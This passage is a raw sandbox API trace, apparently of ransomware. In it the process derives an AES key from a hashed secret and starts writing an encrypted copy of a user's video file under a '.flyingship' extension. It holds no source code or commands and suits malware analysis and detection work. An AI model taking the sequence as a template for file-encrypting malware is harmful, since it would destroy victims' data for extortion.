(Locale=0x400, dwCmpFlags=0x1, lpString1="ZzgTTH\\448L4fbhgcrO5YwRMWv_.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.777] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="zgTTH\\448L4fbhgcrO5YwRMWv_.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.777] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="gTTH\\448L4fbhgcrO5YwRMWv_.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.777] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TTH\\448L4fbhgcrO5YwRMWv_.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.777] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TH\\448L4fbhgcrO5YwRMWv_.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.777] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="H\\448L4fbhgcrO5YwRMWv_.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.777] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\448L4fbhgcrO5YwRMWv_.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0198.777] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="448L4fbhgcrO5YwRMWv_.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0198.777] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="48L4fbhgcrO5YwRMWv_.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0198.777] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="8L4fbhgcrO5YwRMWv_.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0198.777] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="L4fbhgcrO5YwRMWv_.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.777] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4fbhgcrO5YwRMWv_.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0198.777] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="fbhgcrO5YwRMWv_.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0198.777] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="bhgcrO5YwRMWv_.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0198.777] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hgcrO5YwRMWv_.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.777] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="gcrO5YwRMWv_.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.778] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="crO5YwRMWv_.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0198.778] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rO5YwRMWv_.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.778] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="O5YwRMWv_.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.778] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5YwRMWv_.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0198.778] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="YwRMWv_.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.778] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wRMWv_.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.778] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RMWv_.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.778] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0198.778] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0198.778] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0198.778] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0198.778] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="i", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0198.778] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="vi", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0198.778] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="avi", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0198.778] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".avi", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0198.778] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0198.778] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0198.778] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0198.778] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0198.778] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\448L4fbhgcrO5YwRMWv_.avi", lpFindFileData=0x87edb8 | out: lpFindFileData=0x87edb8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9682a920, ftCreationTime.dwHighDateTime=0x1d5d7dc, ftLastAccessTime.dwLowDateTime=0x6c1ae300, ftLastAccessTime.dwHighDateTime=0x1d5e50b, ftLastWriteTime.dwLowDateTime=0x6c1ae300, ftLastWriteTime.dwHighDateTime=0x1d5e50b, nFileSizeHigh=0x0, nFileSizeLow=0x1811c, dwReserved0=0x87ef08, dwReserved1=0x8a7560, cFileName="448L4fbhgcrO5YwRMWv_.avi", cAlternateFileName="448L4F~1.AVI")) returned 0x90af58 [0198.779] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0198.779] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0198.779] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0198.779] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74f20000 [0198.779] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0198.779] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0198.779] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0198.779] CryptAcquireContextA (in: phProv=0x87ea98, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x87ea98*=0x9c0b78) returned 1 [0198.780] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0198.780] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0198.780] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0198.780] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0198.780] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0198.781] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0198.781] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0198.781] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0198.781] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0198.781] CryptCreateHash (in: hProv=0x9c0b78, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x87e808 | out: phHash=0x87e808) returned 1 [0198.781] CharLowerBuffW (in: lpsz="byte[25]", cchLength=0x8 | out: lpsz="byte[25]") returned 0x8 [0198.781] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0198.781] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0198.781] CryptHashData (hHash=0x90ae18, pbData=0x8df0a0, dwDataLen=0x19, dwFlags=0x1) returned 1 [0198.781] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0198.781] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0198.781] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0198.781] CryptDeriveKey (in: hProv=0x9c0b78, Algid=0x660e, hBaseData=0x90ae18, dwFlags=0x1, phKey=0x87e808 | out: phKey=0x87e808*=0x90aed8) returned 1 [0198.782] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0198.782] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0198.782] CryptDestroyHash (hHash=0x90ae18) returned 1 [0198.782] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\448L4fbhgcrO5YwRMWv_.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\z58zbpazzgtth\\448l4fbhgcro5ywrmwv_.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0198.783] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0198.783] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef40 | out: lpNewFilePointer=0x0) returned 1 [0198.783] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deba0 [0198.783] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0198.783] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0198.783] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0198.783] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0198.783] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0198.783] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec90 | out: hHeap=0x8a0000) returned 1 [0198.783] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0198.783] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0198.783] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0198.784] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0198.784] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0198.784] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0198.784] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0198.784] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0198.784] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ae18 [0198.784] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0198.799] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae18 | out: hHeap=0x8a0000) returned 1 [0198.799] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0198.799] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0198.799] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec90 [0198.799] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0198.799] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0198.799] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0198.799] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0198.800] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0198.800] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0198.800] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0198.800] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0198.800] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0198.800] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0198.800] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0198.800] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0198.800] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0198.800] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0198.800] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0198.800] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0198.800] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0198.800] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0198.800] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0198.800] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0198.800] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0198.800] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0198.800] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2838 [0198.800] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0198.800] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x50) returned 0x9238c0 [0198.800] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0198.800] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb0) returned 0x8e6f00 [0198.800] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0198.800] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x70) returned 0x906f38 [0198.800] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0198.800] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x70) returned 0x8fecd8 [0198.800] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e6f00 | out: hHeap=0x8a0000) returned 1 [0198.800] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0198.801] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0198.801] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0198.801] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9238c0 | out: hHeap=0x8a0000) returned 1 [0198.801] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0198.801] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x906f38 | out: hHeap=0x8a0000) returned 1 [0198.801] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0198.801] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0198.801] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0198.801] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0198.801] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x70) returned 0x906f38 [0198.801] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\z58zbpazzgtth")) returned 0x10 [0198.801] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x906f38 | out: hHeap=0x8a0000) returned 1 [0198.801] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0198.801] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8fecd8 | out: hHeap=0x8a0000) returned 1 [0198.801] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0198.801] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0198.801] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0198.801] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ae18 [0198.801] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0xbda010 [0198.802] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0198.802] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0198.802] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\448L4fbhgcrO5YwRMWv_.flyingship.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\z58zbpazzgtth\\448l4fbhgcro5ywrmwv_.flyingship.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0198.803] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deda8 [0198.803] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0198.803] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0198.803] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0198.803] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0198.803] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0198.803] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec90 | out: hHeap=0x8a0000) returned 1 [0198.803] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0198.803] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0198.803] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0198.803] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0198.803] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0198.803] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0198.803] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0198.804] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0198.804] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af98 [0198.804] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0198.804] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af98 | out: hHeap=0x8a0000) returned 1 [0198.804] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0198.804] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af98 [0198.804] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0198.804] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0198.804] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec90 [0198.804] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0198.804] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0198.804] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0198.804] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0198.804] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0198.804] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0198.804] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0198.804] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0198.804] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0198.804] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0198.804] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0198.804] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0198.804] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0198.804] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x100000) returned 0x2480020 [0198.805] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef90 | out: lpNewFilePointer=0x0) returned 1 [0198.805] ReadFile (in: hFile=0x158, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x10000, lpOverlapped=0x0) returned 1 [0198.808] ReadFile (in: hFile=0x158, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x811c, lpOverlapped=0x0) returned 1 [0198.809] ReadFile (in: hFile=0x158, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x0, lpOverlapped=0x0) returned 1 [0198.809] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0198.809] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0198.809] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0198.809] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0198.809] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1811c) returned 0xbea018 [0198.810] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x2480020 | out: hHeap=0x8a0000) returned 1 [0198.810] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0198.810] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0198.810] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec90 | out: hHeap=0x8a0000) returned 1 [0198.810] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0198.810] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0198.810] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1811c) returned 0xa5f008 [0198.812] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbea018 | out: hHeap=0x8a0000) returned 1 [0198.812] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0198.812] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: 